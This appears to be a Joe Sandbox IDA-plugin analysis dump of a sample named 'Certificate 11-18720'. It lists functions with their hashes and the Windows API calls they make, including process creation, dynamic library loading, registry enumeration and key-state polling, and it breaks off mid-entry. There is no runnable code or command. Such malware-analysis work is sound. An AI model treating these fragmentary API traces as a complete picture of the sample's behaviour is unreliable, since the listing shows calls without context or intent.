                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: c10caa75c7912789d8f9cde1506aaab47cc06edda6588c5456a9c2845da57ea6
                                                                                    • Instruction ID: 4bc9b6a0f206cede08d28a35d72774a5c2a94b290a90f55338e9f9e2d17f3e62
                                                                                    • Opcode Fuzzy Hash: c10caa75c7912789d8f9cde1506aaab47cc06edda6588c5456a9c2845da57ea6
                                                                                    • Instruction Fuzzy Hash: 3E213BB4640205ABEB2A9F26DC05ADB7BABEF45720F204A19F9A1D72D1D770D941CB20
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00609653
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00609683
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00609694
                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006096CE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: eccb57b43edc9382c1f4e6b7c5e0ed72164beb931d3a8ba0c372357955c0a902
                                                                                    • Instruction ID: 3c3710a902a023e48fad0d5da7fb1380f4aa34f431d42aee4501c5d4f64b296d
                                                                                    • Opcode Fuzzy Hash: eccb57b43edc9382c1f4e6b7c5e0ed72164beb931d3a8ba0c372357955c0a902
                                                                                    • Instruction Fuzzy Hash: F521A1716502059BEB289F699C04EDB77EBAF45724F200A18F9A1D33D1D7B19941CB30
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0060DB0A
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0060DB5E
                                                                                    • __swprintf.LIBCMT ref: 0060DB77
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0065DC00), ref: 0060DBB5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                    • String ID: %lu
                                                                                    • API String ID: 3164766367-685833217
                                                                                    • Opcode ID: 2d5ba6331a4ec2e530bb7826946804ed9497fe73a65691586b34b4254b750a45
                                                                                    • Instruction ID: 949ab1374ae78db01b13f2ec047d6200139d65f7277801e3c38daf3cd4139455
                                                                                    • Opcode Fuzzy Hash: 2d5ba6331a4ec2e530bb7826946804ed9497fe73a65691586b34b4254b750a45
                                                                                    • Instruction Fuzzy Hash: 19219575A00149AFCB14EFA5CD85EAEBBB9FF89704B004069F909D7391DB70EA41CB61
                                                                                    APIs
                                                                                      • Part of subcall function 005FC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 005FC84A
                                                                                      • Part of subcall function 005FC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005FC85D
                                                                                      • Part of subcall function 005FC82D: GetCurrentThreadId.KERNEL32 ref: 005FC864
                                                                                      • Part of subcall function 005FC82D: AttachThreadInput.USER32(00000000), ref: 005FC86B
                                                                                    • GetFocus.USER32 ref: 005FCA05
                                                                                      • Part of subcall function 005FC876: GetParent.USER32(?), ref: 005FC884
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 005FCA4E
                                                                                    • EnumChildWindows.USER32(?,005FCAC4), ref: 005FCA76
                                                                                    • __swprintf.LIBCMT ref: 005FCA90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                    • String ID: %s%d
                                                                                    • API String ID: 3187004680-1110647743
                                                                                    • Opcode ID: 5ecdfc4401cfe5f7ff6b77a9df75786bf73632bb5a600c2479b62adbe69818b1
                                                                                    • Instruction ID: b21bf1c2bedf01c0273b3841498b10c7f5762244cdd7b508d416c22b1f7fb41f
                                                                                    • Opcode Fuzzy Hash: 5ecdfc4401cfe5f7ff6b77a9df75786bf73632bb5a600c2479b62adbe69818b1
                                                                                    • Instruction Fuzzy Hash: 8411607560020EAACB11BFA09D89FF93F69BB85714F008076BF09AA182DB749645DB70
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 005E7AD8
                                                                                      • Part of subcall function 005E7CF4: __mtinitlocknum.LIBCMT ref: 005E7D06
                                                                                      • Part of subcall function 005E7CF4: EnterCriticalSection.KERNEL32(00000000,?,005E7ADD,0000000D), ref: 005E7D1F
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 005E7AE5
                                                                                    • __lock.LIBCMT ref: 005E7AF9
                                                                                    • ___addlocaleref.LIBCMT ref: 005E7B17
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                    • String ID: `d
                                                                                    • API String ID: 1687444384-79306151
                                                                                    • Opcode ID: 59c7ab0dcc15e68bf69ee4844a026e01685ba51f3e0352b22a09dbb0826f2cdd
                                                                                    • Instruction ID: 1383eb0b277a79081ae95d35f3ec17ed974b69ab7c33eb5307cc51d7eec6ab37
                                                                                    • Opcode Fuzzy Hash: 59c7ab0dcc15e68bf69ee4844a026e01685ba51f3e0352b22a09dbb0826f2cdd
                                                                                    • Instruction Fuzzy Hash: 19015B71404B45EED7259F76C90974ABBE4FF94321F20890EA4DA966A0DBB0A680CB01
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0062E33D
                                                                                    • _memset.LIBCMT ref: 0062E34C
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00683D00,00683D44), ref: 0062E37B
                                                                                    • CloseHandle.KERNEL32 ref: 0062E38D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                    • String ID: D=h
                                                                                    • API String ID: 3277943733-2706595290
                                                                                    • Opcode ID: bdfa37e9ac33eb443cfab5b1bcd56ccbe6601fed7a463b9dfd51adc43f4f927e
                                                                                    • Instruction ID: d30a4b8bf0863124dc1d266510deed717c16bae4f07f15901e0d6d5ce16fec9c
                                                                                    • Opcode Fuzzy Hash: bdfa37e9ac33eb443cfab5b1bcd56ccbe6601fed7a463b9dfd51adc43f4f927e
                                                                                    • Instruction Fuzzy Hash: 43F05EF1540324BAE3106BA1AC49F777E5EEF05F54F005521FE48D62A2D7B59E0087A8
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006219F3
                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00621A26
                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00621B49
                                                                                    • CloseHandle.KERNEL32(?), ref: 00621BBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2364364464-0
                                                                                    • Opcode ID: 1909ed8a22aff391105aa1f3c3ec81cb714cda238acd4cddeb3e49172a57c9f4
                                                                                    • Instruction ID: 690aa1dc15d7fee2df039aeda0713b972e1f2ba12b7afcb44de7df5ed075e4a1
                                                                                    • Opcode Fuzzy Hash: 1909ed8a22aff391105aa1f3c3ec81cb714cda238acd4cddeb3e49172a57c9f4
                                                                                    • Instruction Fuzzy Hash: E4819674600215ABDF209F54C88ABADBBF6BF55710F04845AF905AF3D2D7B4AD418F90
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 00601CB4
                                                                                    • VariantClear.OLEAUT32(00000013), ref: 00601D26
                                                                                    • VariantClear.OLEAUT32(00000000), ref: 00601D81
                                                                                    • VariantClear.OLEAUT32(?), ref: 00601DF8
                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00601E26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                    • String ID:
                                                                                    • API String ID: 4136290138-0
                                                                                    • Opcode ID: 9e65d094efb9f23ea45c38a1b2992f859a6640ece074b7097b86ca193c4d716a
                                                                                    • Instruction ID: 95536cfd8f345e1bc44fa11d997e64c1c72c1637889cd295e93a38d8a62a6329
                                                                                    • Opcode Fuzzy Hash: 9e65d094efb9f23ea45c38a1b2992f859a6640ece074b7097b86ca193c4d716a
                                                                                    • Instruction Fuzzy Hash: D15149B5A00209EFDB14CF58C884AAAB7F9FF4D314B158559E959DB340E730EA51CBA0
                                                                                    APIs
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 006206EE
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0062077D
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0062079B
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 006207E1
                                                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 006207FB
                                                                                      • Part of subcall function 005DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0060A574,?,?,00000000,00000008), ref: 005DE675
                                                                                      • Part of subcall function 005DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0060A574,?,?,00000000,00000008), ref: 005DE699
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 327935632-0
                                                                                    • Opcode ID: 044ae81484e06f213167f7f26a47d0c4fa6520447f31d0e9b525c3171f274f7e
                                                                                    • Instruction ID: 0985c0ecb6f610b9d12845f22891c71c7faba266954f850296fb6ca5a75d8e5f
                                                                                    • Opcode Fuzzy Hash: 044ae81484e06f213167f7f26a47d0c4fa6520447f31d0e9b525c3171f274f7e
                                                                                    • Instruction Fuzzy Hash: 09517E75A00616DFDB00EFA8D485EEDBBB6BF49310B048059E915AB352DB30ED42CF50
                                                                                    APIs
                                                                                      • Part of subcall function 00623C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00622BB5,?,?), ref: 00623C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00622EEF
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00622F2E
                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00622F75
                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00622FA1
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00622FAE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                    • String ID:
                                                                                    • API String ID: 3740051246-0
                                                                                    • Opcode ID: 68c6fe28e6182e180fa0b42f9c4054bf11060116568978fa0723d0d5e8583b35
                                                                                    • Instruction ID: e87c1ca201209ded0316c6caa7d37265f28e9b3e0ab92afb698e112ae09328d8
                                                                                    • Opcode Fuzzy Hash: 68c6fe28e6182e180fa0b42f9c4054bf11060116568978fa0723d0d5e8583b35
                                                                                    • Instruction Fuzzy Hash: 99515971208206AFC704EF94D995FAABBFAFF88714F04892DF59587291DB30E905CB52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2162e89e6a4acf91fbaf24880c37689789d9ed30a9b7479e8e508b62e50a63ee
                                                                                    • Instruction ID: 61cd483d0ff83351b2688d9ce80f7343a01d4627b29cea5ceaee473bb5397400
                                                                                    • Opcode Fuzzy Hash: 2162e89e6a4acf91fbaf24880c37689789d9ed30a9b7479e8e508b62e50a63ee
                                                                                    • Instruction Fuzzy Hash: 7D41C339900924AFC720DB68DC44FEDBB6AEF0A360F150665E959A72E1C670AD42DE50
                                                                                    APIs
                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006112B4
                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006112DD
                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0061131C
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00611341
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00611349
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1389676194-0
                                                                                    • Opcode ID: 92a18291b7498ac0fa73727b2ea6f51ea44426e0dd2dc1301d84179401d6c074
                                                                                    • Instruction ID: e11df4d31647e55f02a7960f87721d963a2571f5876154fa3d1325edd7f46be4
                                                                                    • Opcode Fuzzy Hash: 92a18291b7498ac0fa73727b2ea6f51ea44426e0dd2dc1301d84179401d6c074
                                                                                    • Instruction Fuzzy Hash: 40410935A00145DFCB01EFA4C985EAEBBF5FF49710B148099E90AAB362CB31EE41DB50
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(000000FF), ref: 005DB64F
                                                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 005DB66C
                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 005DB691
                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 005DB69F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                    • String ID:
                                                                                    • API String ID: 4210589936-0
                                                                                    • Opcode ID: b744c2ab7ccd5d215135ee5827a2217baf1d54841463109573a1e4ce56d93363
                                                                                    • Instruction ID: 3aa8532a3ca59d7d71a89a95b99a86caffcbc6e878a8c4122ac43235e6fc99bb
                                                                                    • Opcode Fuzzy Hash: b744c2ab7ccd5d215135ee5827a2217baf1d54841463109573a1e4ce56d93363
                                                                                    • Instruction Fuzzy Hash: 02416035904115FFDF259F68C884AE9BB76FB05324F11431AF86996290CB30A994DFA1
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 005FB369
                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 005FB413
                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 005FB41B
                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 005FB429
                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 005FB431
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3382505437-0
                                                                                    • Opcode ID: 96b3cc8b1b9c8ca797b00328c767c52147bfab1a542ca8c6a50bd69e7e470e4a
                                                                                    • Instruction ID: 9d7bbfbce7320fcddd1af1254d560852ebc79cc54f8e17b3a2705cac35a004d7
                                                                                    • Opcode Fuzzy Hash: 96b3cc8b1b9c8ca797b00328c767c52147bfab1a542ca8c6a50bd69e7e470e4a
                                                                                    • Instruction Fuzzy Hash: CC31CC7190021DEBEF04DFA8D94DAAE3FB6FB05319F104629FA25AB1D1C3B49914CB91
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 005FDBD7
                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 005FDBF4
                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 005FDC2C
                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 005FDC52
                                                                                    • _wcsstr.LIBCMT ref: 005FDC5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                    • String ID:
                                                                                    • API String ID: 3902887630-0
                                                                                    • Opcode ID: a026c31628c35d9773a093574182071537bf2b944a0fbca1227ce54e0581ab13
                                                                                    • Instruction ID: 0067ff51961ded39d249870de73548bdb17e81241e30941cc489368c5ee1718e
                                                                                    • Opcode Fuzzy Hash: a026c31628c35d9773a093574182071537bf2b944a0fbca1227ce54e0581ab13
                                                                                    • Instruction Fuzzy Hash: B721F571604148BBEB259F399C49E7B7FAAFF85750F10402AF90ACA191EAA5CC4196A0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005FBC90
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005FBCC2
                                                                                    • __itow.LIBCMT ref: 005FBCDA
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005FBD00
                                                                                    • __itow.LIBCMT ref: 005FBD11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
